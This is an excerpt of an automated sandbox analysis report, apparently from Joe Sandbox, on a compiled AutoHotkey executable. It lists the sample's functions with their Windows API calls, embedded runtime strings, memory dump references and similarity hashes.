Function 00000001400207E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32 ref: 000000014002081A
SizeofResource.KERNEL32 ref: 0000000140020831
LoadResource.KERNEL32 ref: 0000000140020848
LockResource.KERNEL32 ref: 000000014002085A

Part of subcall function 00000001400CBD40: malloc.LIBCMT ref: 00000001400CBD5A

Part of subcall function 000000014001E550: GetCPInfo.KERNEL32 ref: 000000014001E591

Strings

Could not extract script from EXE., xrefs: 00000001400208F1
>AUTOHOTKEY SCRIPT<, xrefs: 00000001400207F5

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: Resource$FindInfoLoadLockSizeofmalloc
String ID: >AUTOHOTKEY SCRIPT<$Could not extract script from EXE.
API String ID: 3366556718-1775548002
Opcode ID: 840d3e8bd2a95796dacf3a100e672b9923200d7120eda528d17b46d9d9697ea1
Instruction ID: cab6452ae4ea39bf66a56cbe86202ff63733d7b139b4f8c1968d271111c70a4e
Opcode Fuzzy Hash: 840d3e8bd2a95796dacf3a100e672b9923200d7120eda528d17b46d9d9697ea1
Instruction Fuzzy Hash: 1C312A31605B4181EF568B56E45439AA7A0F74CBD4F488129EF8D0BBAADF7CC544CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400AE260 Relevance: 6.1, APIs: 4, Instructions: 137fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32 ref: 00000001400AE36D
FindClose.KERNEL32 ref: 00000001400AE381
FindFirstFileW.KERNEL32 ref: 00000001400AE3E9
FindClose.KERNEL32 ref: 00000001400AE3FC

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 4056a64f022cceb0b9e7b8a2bf314aeb2360360c8667111d46ef66bb8d791686
Instruction ID: 94cdea3f9907efedc516e2110913d4c69deef7d2003eb3cdd69ab6ac2ddfa90e
Opcode Fuzzy Hash: 4056a64f022cceb0b9e7b8a2bf314aeb2360360c8667111d46ef66bb8d791686
Instruction Fuzzy Hash: 5951CE32304B8491EE168B16D5483EEB3A9FB58BE4F558716EB69077E4DF38C54AC700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400CF0C4 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32 ref: 00000001400CF0DA
GetVersion.KERNEL32 ref: 00000001400CF0EC
HeapSetInformation.KERNEL32 ref: 00000001400CF10A

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: Heap$CreateInformationVersion
String ID:
API String ID: 3563531100-0
Opcode ID: 867d4f5f3279397e4bbd960a59fafff3a38206645af244dc8cfd15551f6c3b06
Instruction ID: 63c02c62673443b255dc33ca7baa30011fb977f08ed244e21473c830617398ca
Opcode Fuzzy Hash: 867d4f5f3279397e4bbd960a59fafff3a38206645af244dc8cfd15551f6c3b06
Instruction Fuzzy Hash: 85E0927462174082FB8A5B53F845BE92261F78C780F805414FB4A03B74DF3CC4958700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014008A6B0 Relevance: 3.2, APIs: 2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ff647453dfc0595fa38c5452dfa41f10c5cee97e853db53694640067afaa161
Instruction ID: 352ee66d33409a8207d53355359db1d6f0d7ce4a317c326a2f5a1df4ccb30269
Opcode Fuzzy Hash: 7ff647453dfc0595fa38c5452dfa41f10c5cee97e853db53694640067afaa161
Instruction Fuzzy Hash: 3D91B47321869481FB6A8F1794403F922A1FF4EBE4F554116EB9A47EE4DE3CDA82D340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140005690 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 102
sleepwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindWindowW.USER32 ref: 000000014000571C
FindWindowW.USER32 ref: 000000014000578C
PostMessageW.USER32 ref: 00000001400057B0
Sleep.KERNEL32(?,?,?,?,?,?,?,00000001400053C5), ref: 00000001400057BD
IsWindow.USER32 ref: 00000001400057C6
Sleep.KERNEL32(?,?,?,?,?,?,?,00000001400053C5), ref: 00000001400057FE
IsWindow.USER32 ref: 0000000140005807
Sleep.KERNEL32(?,?,?,?,?,?,?,00000001400053C5), ref: 0000000140005816

Strings

AutoHotkey, xrefs: 0000000140005715, 0000000140005785
An older instance of this script is already running. Replace it with this instance?Note: To avoid this message, see #SingleInsta, xrefs: 000000014000574B
Could not close the previous instance of this script. Keep waiting?, xrefs: 00000001400057D8
d, xrefs: 00000001400057D0

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: Window$Sleep$Find$MessagePost
String ID: An older instance of this script is already running. Replace it with this instance?Note: To avoid this message, see #SingleInsta$AutoHotkey$Could not close the previous instance of this script. Keep waiting?$d
API String ID: 1104075879-823662016
Opcode ID: 534af8cbe4c465dde1be47f0b0cc61f8d6374477e8bbc3458ef2448a851e8a90
Instruction ID: e2dd331400aee73dd6788f8c969a16774231fd3242114c7c800b54ab95a38d39
Opcode Fuzzy Hash: 534af8cbe4c465dde1be47f0b0cc61f8d6374477e8bbc3458ef2448a851e8a90
Instruction Fuzzy Hash: F641A1B0608A8482FB67DB27F8443EA23A0F74EBD5F544112FB4957AB0DB39C982D741

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400AF3A0 Relevance: 19.7, APIs: 13, Instructions: 164
windowlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 00000001400AF3D3
EnumResourceNamesW.KERNEL32 ref: 00000001400AF43B
FindResourceW.KERNEL32 ref: 00000001400AF458
LoadResource.KERNEL32 ref: 00000001400AF46D
LockResource.KERNEL32 ref: 00000001400AF47F
GetSystemMetrics.USER32 ref: 00000001400AF49F
FindResourceW.KERNEL32 ref: 00000001400AF515
LoadResource.KERNEL32 ref: 00000001400AF529
LockResource.KERNEL32 ref: 00000001400AF537
SizeofResource.KERNEL32 ref: 00000001400AF54B
CreateIconFromResourceEx.USER32 ref: 00000001400AF56E
ExtractIconW.SHELL32 ref: 00000001400AF5CA

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: Resource$Load$FindIconLock$CreateEnumExtractFromLibraryMetricsNamesSizeofSystem
String ID:
API String ID: 1568753105-0
Opcode ID: c0203156b92e32127f6de8b076c345afb3e2e429f059fbe4e914985719cc95ad
Instruction ID: 5e1e8fa29e4a3c6f95bed64de419706901ec8fd4e3d1dd421cb95e770b26a536
Opcode Fuzzy Hash: c0203156b92e32127f6de8b076c345afb3e2e429f059fbe4e914985719cc95ad
Instruction Fuzzy Hash: B151B331701B5086EB669FA3A4447F96290BB5CBD4F084629EF4A5BBB4DB3CC885DB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014001F770 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 296
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.LIBCMT ref: 000000014001F789

Part of subcall function 00000001400CA9A4: _FF_MSGBANNER.LIBCMT ref: 00000001400CA9D4
Part of subcall function 00000001400CA9A4: RtlAllocateHeap.NTDLL(?,?,00000000,00000001400D0AA0,?,?,00000000,00000001400CF2DD,?,?,?,00000001400CF387,?,?,00000000,00000001400CE775), ref: 00000001400CA9F9
Part of subcall function 00000001400CA9A4: _callnewh.LIBCMT ref: 00000001400CAA12
Part of subcall function 00000001400CA9A4: _errno.LIBCMT ref: 00000001400CAA1D
Part of subcall function 00000001400CA9A4: _errno.LIBCMT ref: 00000001400CAA28

SetTimer.USER32 ref: 000000014001F7E7
free.LIBCMT ref: 000000014001F90B

Strings

Out of memory., xrefs: 000000014001FC85
Memory limit reached (see #MaxMem in the help file)., xrefs: 000000014001FA4E

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: _errno$AllocateHeapTimer_callnewhfreemalloc
String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
API String ID: 4178756891-457448710
Opcode ID: e6366f6a94b29d39e5f010e0094093afdbc9b1c6f862037dcbd1b9d2d24e3e10
Instruction ID: 077ae810bc4ca999dc93366e368ff4484df90a768739f30114619d90bdd23bfa
Opcode Fuzzy Hash: e6366f6a94b29d39e5f010e0094093afdbc9b1c6f862037dcbd1b9d2d24e3e10
Instruction Fuzzy Hash: 39E1BF72204B8486EB169F26E4903E937A1F74CFD8F544126EF4A1B7B9CB39C491E750

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036EED Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 264
windowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649

Strings

Parameter #1 invalid., xrefs: 0000000140036F55
Parameter #2 invalid., xrefs: 0000000140037001
Delete, xrefs: 0000000140036FCF
Parameter #1 must not be blank in this case., xrefs: 0000000140036F8B
Target label does not exist., xrefs: 0000000140036F28

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID: Delete$Parameter #1 invalid.$Parameter #1 must not be blank in this case.$Parameter #2 invalid.$Target label does not exist.
API String ID: 1623861271-14243736
Opcode ID: 170ba651c1674d1279c71c36e1bdddfff0732a7a2a17f9185ea6cdc42fcc8acb
Instruction ID: 26eb0c6a927c8469de8453c9fe8dc0c9a9131a3f6a014df82fcab0b3381e4e2a
Opcode Fuzzy Hash: 170ba651c1674d1279c71c36e1bdddfff0732a7a2a17f9185ea6cdc42fcc8acb
Instruction Fuzzy Hash: FCD18A32205B4085FB6BCB27E8947EA67A1F74DBE4F544116EB9987AF5DB38C880C740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400029D2 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 237threadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,Unk,?,?,AutoHotkey v1.1.37.01,?,00000001400B5089), ref: 0000000140002A03
GetWindowThreadProcessId.USER32 ref: 0000000140002A1A
GetClassNameW.USER32 ref: 0000000140002A3C
IsDialogMessageW.USER32 ref: 0000000140002A7E
SetCurrentDirectoryW.KERNEL32(?,?,?,Unk,?,?,AutoHotkey v1.1.37.01,?,00000001400B5089), ref: 0000000140002AAE
DragFinish.SHELL32 ref: 00000001400030D3

Strings

#32770, xrefs: 0000000140002A49

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: Window$ClassCurrentDialogDirectoryDragFinishForegroundMessageNameProcessThread
String ID: #32770
API String ID: 3456408793-463685578
Opcode ID: 84b13adb65ceb99b281e05724dc7483e5ead739dbe4e009cd9d285627489fc5a
Instruction ID: 49313f828538e75c30cdc6f1b82b6477001a2d0cb5092b9eb6642ea2267f5eaa
Opcode Fuzzy Hash: 84b13adb65ceb99b281e05724dc7483e5ead739dbe4e009cd9d285627489fc5a
Instruction Fuzzy Hash: 92C12972205B818AEB67CF27B8543E937A4F78DBD8F184125EB5A17AB5DB34C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400CD974 Relevance: 18.1, APIs: 12, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStartupInfoW.KERNEL32 ref: 00000001400CD986
_FF_MSGBANNER.LIBCMT ref: 00000001400CD9F1
_FF_MSGBANNER.LIBCMT ref: 00000001400CDA1C
_RTC_Initialize.LIBCMT ref: 00000001400CDA35
_amsg_exit.LIBCMT ref: 00000001400CDA49
GetCommandLineW.KERNEL32 ref: 00000001400CDA4E
__wsetargv.LIBCMT ref: 00000001400CDA67
_amsg_exit.LIBCMT ref: 00000001400CDA75
_amsg_exit.LIBCMT ref: 00000001400CDA88
_cinit.LIBCMT ref: 00000001400CDA92
_amsg_exit.LIBCMT ref: 00000001400CDA9D
_wwincmdln.LIBCMT ref: 00000001400CDAA2

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: _amsg_exit$CommandInfoInitializeLineStartup__wsetargv_cinit_wwincmdln
String ID:
API String ID: 697445056-0
Opcode ID: bce173359365123898862994a165c1e3b1e3734ab59bfec563374195f2aef69a
Instruction ID: 51f8df33ae2182358a762f7e5c0acf8f3a72d97982b6cc7e773f68050256edbc
Opcode Fuzzy Hash: bce173359365123898862994a165c1e3b1e3734ab59bfec563374195f2aef69a
Instruction Fuzzy Hash: 33415C7160834186FB5FBBA3A5513E93291AB8D7C4F00403AB746872F3EF7CC841A652

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003355B Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 351windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
free.LIBCMT ref: 00000001400335AC
free.LIBCMT ref: 000000014003374B

Strings

Jumps cannot exit a FINALLY block., xrefs: 0000000140038BC9

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: free$ClipboardCloseCountGlobalMessagePeekTickUnlock
String ID: Jumps cannot exit a FINALLY block.
API String ID: 2404689025-672026804
Opcode ID: 43d9194056ab89d80e4a628be4931cc454df74e0c15ad80cb1a3a755224a8d3b
Instruction ID: 11d81beff7c062691fcf3309096d5211e5507ad6f342d50fc40e6d568f83c0dd
Opcode Fuzzy Hash: 43d9194056ab89d80e4a628be4931cc454df74e0c15ad80cb1a3a755224a8d3b
Instruction Fuzzy Hash: ED027872604B448AEB6B8B27E4807EA77A1F74DBE4F180116EF5947BB5DB38D881C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140001EC8 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 141windowsleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000000140001C7D
GetTickCount.KERNEL32 ref: 0000000140001CD8
GetMessageW.USER32 ref: 0000000140001D1B
GetTickCount.KERNEL32 ref: 0000000140001D2A
GetTickCount.KERNEL32 ref: 0000000140001EF3
PeekMessageW.USER32 ref: 0000000140001F43
GetTickCount.KERNEL32 ref: 0000000140001F51
Sleep.KERNEL32(?,?,?,Unk,?,?,AutoHotkey v1.1.37.01,?,00000001400B5089), ref: 0000000140001F7B

Strings

uL, xrefs: 0000000140001F5B
/, xrefs: 0000000140001F86

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$Message$PeekSleep
String ID: /$uL
API String ID: 2985371716-1063157875
Opcode ID: 1149db2fec4be604e6d0738c93d0896230f924d54a21e451ef9d554d7e32668d
Instruction ID: 1af2d153454a1643499736a5c385c5f9bea2398b6997ec81ffdbcc6d3eaea01c
Opcode Fuzzy Hash: 1149db2fec4be604e6d0738c93d0896230f924d54a21e451ef9d554d7e32668d
Instruction Fuzzy Hash: 417162726046809AFB57CF27F8547E937A1F78CB98F144126EB8A476B5CB34C482CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003330C Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 240
windowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000001400CBD40: malloc.LIBCMT ref: 00000001400CBD5A

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
free.LIBCMT ref: 00000001400333B5
free.LIBCMT ref: 00000001400333C1

Strings

Out of memory., xrefs: 00000001400333E7

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTickfree$ClipboardCloseGlobalMessagePeekUnlockmalloc
String ID: Out of memory.
API String ID: 2261973038-4087320997
Opcode ID: 91fa6281f2abb8e96c6eb3eb6a0a92057783dbd265ec9c8811d5a6502596e99f
Instruction ID: 426ea23cb0a584ebe7be426a9f350f2fcfeb2d3257a83d6a6a28297b01ac80b4
Opcode Fuzzy Hash: 91fa6281f2abb8e96c6eb3eb6a0a92057783dbd265ec9c8811d5a6502596e99f
Instruction Fuzzy Hash: C6C16D76605B408AEB6BCB27E8807DA77A1F74DBD4F140116EB9947BB5DB38D881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038239 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 237
windowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

